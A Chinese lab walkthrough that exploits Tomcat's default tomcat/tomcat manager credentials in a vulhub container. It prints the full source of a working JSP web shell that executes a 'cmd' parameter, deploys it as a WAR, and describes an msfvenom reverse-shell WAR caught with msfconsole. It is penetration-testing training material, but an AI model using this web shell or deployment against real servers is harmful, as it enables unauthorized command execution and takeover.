Tomcat弱口令漏洞

Tomcat弱口令漏洞



漏洞原理:传送门

实验环境

主机角色IP
centos8漏洞靶机192.168.1.80
kalimsf生成木马,接收shell192.168.1.128
windows10攻击机192.168.1.120

实验流程

开启漏洞靶机centos8

# 开启docker服务
service docker start
# 切换到vulhub目录
cd /usr/sbin/vulhub/tomcat/tomcat8
# 创建镜像
docker-compose build
# 开启镜像
docker-compose up -d

尝试访问漏洞页面:

image-20210516193255115

如图所示,访问成功!

进入镜像配置文件查看初始密码:

# 进入镜像
docker exec -it 镜像id /bin/bash
# 切换到配置目录
cd /usr/local/tomcat/conf
# 查看配置文件
cat tomcat-users.xml

image-20210516193622522

如图所示,可以看出tomcat管理页面的用户名和密码都是tomcat,存在明显的弱口令漏洞。

输入用户名和密码,成功登录到tomcat管理页面:

image-20210516193327450

第一种方式上传webshell

准备一个木马文件shell.jsp

内容如下:

<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
	StringBuilder line = new StringBuilder();
	try {
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null){
			line.append(temp+"\\n");
		}
		buf.close();
	} catch (Exception e) {
		line.append(e.getMessage());
	}
	return line.toString();
}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");
}
%>

在windows10的dos界面下,将shell.jsp打包为shell.war,用于javaweb包的热部署

打包命令为jar cvf shell.war shell.jsp

image-20210516195051701

如下图所示,成功打包为shell.war:

image-20210516195152558

将shell.war包上传到javaweb应用中:

image-20210516195342023

如下图所示,上传并部署成功:

image-20210516195430303

尝试访问木马文件,并传入命令参数:

image-20210516195652287

如图所示,成功回显命令执行结果。


第二种方式msf反弹shell

在kali主机,利用msfvenom工具生成war文件木马:

LHOST=kali的IP

LPORT=kali的端口(任意)

image-20210516200320992

如图所示,生成完毕。

将生成的木马文件下载下来到window主机:

image-20210516200348508

如图所示,下载完毕:

image-20210516200634337

将qianxun.war更改为qianxun.rar,并用压缩工具winrar打开:

image-20210516200652417

image-20210516200725625

如上图所示,在qianxun.war包中还有木马文件vzajtnpod.jsp,记下文件名后,将qianxun.rar重新改回为qianxun.war

将木马文件qianxun.war上传到javaweb应用中:

image-20210516200505574

在kali主机上开启msfconsole监听:

image-20210516201245931

在浏览器中访问该木马文件:

image-20210516201408253

再回到kali,发现shell已被成功反弹:

image-20210516201222722

至此,实验完毕。

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值